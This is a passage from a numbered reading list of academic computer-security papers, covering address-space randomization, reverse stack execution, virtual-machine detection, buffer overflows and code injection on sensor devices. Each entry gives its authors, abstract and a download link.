    Address-space randomization (ASR) is a promising solution to defend against memory corruption attacks that have contributed to about three-quarters of US-CERT advisories in the past few years. Several techniques have been proposed for implementing ASR on Linux, but its application to Microsoft Windows, the largest monoculture on the Internet, has not received as much attention. We address this problem in this paper and describe a solution that provides about 15 bits of randomness in the locations of all (code or data) objects. Our randomization is applicable to all processes on a Windows box, including all core system services, as well as applications such as web browsers, office applications, and so on. Our solution has been deployed continuously for about a year on a desktop system used daily, and is robust enough for production use.

    Download: seclab.cs.sunysb.edu/seclab/pubs/acsac06.pdf
  22. Reverse Stack Execution Babak Salamat bsalamat@uci.edu Andreas Gal gal@uci.edu Alexander Yermolovich ayermolo@uci.edu Karthik Manivannan kmanivan@uci.edu Michael Franz franz@uci.edu Donald Bren School of Information and Computer Sciences University of California, Irvine Irvine, CA 92697, USA Technical Report No. 07-07 August 23, 2007 Abstract Introducing variability during program execution is an effective technique for fighting software monoculture which enables the quick spread of malicious code such as viruses and worms. Existing works in the area of automatic generation of execution variability have been limited to instruction randomization and heap allocation randomization, even though stack overflows are the predominant attack vectors used to inject malicious code. We present a compiler-based technique that introduces stack variance by reversing the stack growth direction, and is thus able to close this loophole. In this paper we discuss the steps necessary to reverse the stack growth direction for the Intel x86 instruction set which was designed for a single stack growth direction. The performance evaluation of our approach shows a negligible overhead for most applications. For one of the benchmark applications, we see a small performance gain. Download: www.ics.uci.edu/~kmanivan/files/TechReport07-07.pdf
  23. Detection and Subversion of Virtual Machines Dan Upton University of Virginia CS 851 - Virtual Machines Abstract Recent virtual machines have been designed to take advantage of run-time information to provide various services including dynamic optimization, instrumentation, and enforcement of security policies. While these systems must run in the same user space as the program running under their control, they must remain as transparent as possible so as to prevent affecting the correctness of the guest program. However, the virtual machine must store its own code and program state as well as information about the guest program. This data, stored in the program's user space, may lead to gaps in transparency that can be used to detect their presence. Additionally, while many virtual machines have a smaller code base than operating systems, they may still contain their own unique errors and security holes. This research shows that it is possible to use different run-time clues to detect the existence of several common virtual machines. Further, information about the existence of these virtual machines can be used to attack the system. As a result, this paper presents countermeasures that should be taken by designers of these systems to prevent detection and attacks. Download: www.cs.virginia.edu/~dsu9w/upton06detection.pdf
  24. BUFFER OVERFLOW VULNERABILITIES EXPLOITS AND DEFENSIVE TECHNIQUES Authors Peter Buchlovsky, Adam Butcher UID 319295, 309235 Email msc33pxb@cs.bham.ac.uk, ug75ajb@cs.bham.ac.uk Introduction Buffer overflows are a very common method of security breach. They generally occur in programs written in low-level languages like C or C++ which allow the manual management of memory on the heap and stack. Server processes or low-level programs running as the superuser are the usual targets for such attacks. If a hacker can find a buffer overflow vulnerability in such a process and can exploit it, it will usually give the hacker full control of the system. The analysis of Lhee and Chapin [8] has proved most helpful in our research. 1.1 Array bounds checking Most high-level programming languages claim to be safe. This means that programs written in these languages have rigorously controlled access to memory. Thus they do not suffer from buffer overflows or dangling pointers. This is in contrast to the C and C++ programming languages which have a more cavalier approach to memory access and safety. In C, array access is not bounds checked. That means it is possible to write past the end (or indeed the beginning if it is being written to backwards) of an array. This leads to a number of exploits that can be used by attackers. Download: citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.104.8202&rep=rep1&type=pdf
  25. Code Injection Attacks on Harvard-Architecture Devices Aurélien Francillon INRIA Rhône-Alpes 655 avenue de l’Europe, Montbonnot 38334 Saint Ismier Cedex, France aurelien.francillon@inria.fr Claude Castelluccia INRIA Rhône-Alpes 655 avenue de l’Europe, Montbonnot 38334 Saint Ismier Cedex, France claude.castelluccia@inria.fr ABSTRACT Harvard architecture CPU design is common in the embedded world. Examples of Harvard-based architecture devices are the Mica family of wireless sensors. Mica motes have limited memory and can process only very small packets. Stack-based buffer overflow techniques that inject code into the stack and then execute it are therefore not applicable. It has been a common belief that code injection is impossible on Harvard architectures. This paper presents a remote code injection attack for Mica sensors. We show how to exploit program vulnerabilities to permanently inject any piece of code into the program memory of an Atmel AVR-based sensor. To our knowledge, this is the first result that presents a code injection technique for such devices. Previous work only succeeded in injecting data or performing transient attacks. Injecting permanent code is more powerful since the attacker can gain full control of the target sensor. We also show that this attack can be used to inject a worm that can propagate through the wireless sensor network and possibly create a sensor botnet. Our attack combines different techniques such as return oriented programming and fake stack injection. We present implementation details and suggest some counter-measures. Download: www.inrialpes.fr/planete/people/ccastel/PAPERS/CCS08.pdf